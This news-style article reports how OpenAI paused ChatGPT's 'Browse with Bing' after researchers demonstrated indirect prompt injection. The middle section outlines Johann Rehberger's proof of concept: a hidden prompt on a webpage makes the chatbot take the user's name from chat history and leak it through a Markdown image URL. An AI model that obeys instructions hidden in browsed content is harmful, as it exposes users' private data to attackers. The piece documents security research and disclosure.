OpenAI temporarily disabled its new browsing feature for ChatGPT Plus subscribers following the public demonstration of significant security vulnerabilities. The feature, named “Browse with Bing,” allowed the large language model (LLM) to access the live internet to provide users with up-to-date information. However, security researchers quickly uncovered methods to exploit this capability through prompt injection attacks.

The core issue revolves around the AI’s interaction with external web content. When a user asks ChatGPT to summarize a webpage, the browsing feature visits the page and processes its content. Researchers demonstrated that malicious instructions hidden within a webpage’s code could hijack the chatbot’s operations, causing it to perform actions unintended by the user.

Proof-of-Concept Attack Exfiltrates User Data

Security researcher Johann Rehberger published a proof-of-concept demonstrating how to exploit the browsing feature. Rehberger created a webpage containing a hidden prompt. When ChatGPT’s browser was directed to this page for a summary, it executed the hidden instructions. The malicious prompt instructed the chatbot to retrieve personally identifiable information (PII) from the user’s previous conversation history.

In his demonstration, the hidden prompt specifically commanded the chatbot to reveal the user’s name. It then instructed the AI to embed this captured information into a URL using a Markdown image tag. This action effectively sent the user’s data to an external server controlled by the researcher, a process known as data exfiltration. This type of attack is classified as an indirect prompt injection because the malicious instructions are not supplied by the user directly but are instead ingested from a compromised external data source.

The Challenge of Securing Internet-Connected LLMs

The successful demonstrations by Rehberger and other researchers, such as Kai Greshake, highlighted the security challenges inherent in connecting LLMs to the internet. The attacks work because the AI model is designed to follow instructions, and it was not able to effectively distinguish between the user’s legitimate request and the malicious commands hidden within the browsed web content.

In response to these public disclosures, OpenAI took action by disabling the “Browse with Bing” feature. The company stated it was taking the feature offline to address the issue of the model sometimes displaying content in ways that were not intended by the original website owners. The incidents serve as a real-world example of the security problems facing developers as they integrate AI with external, uncontrolled data sources.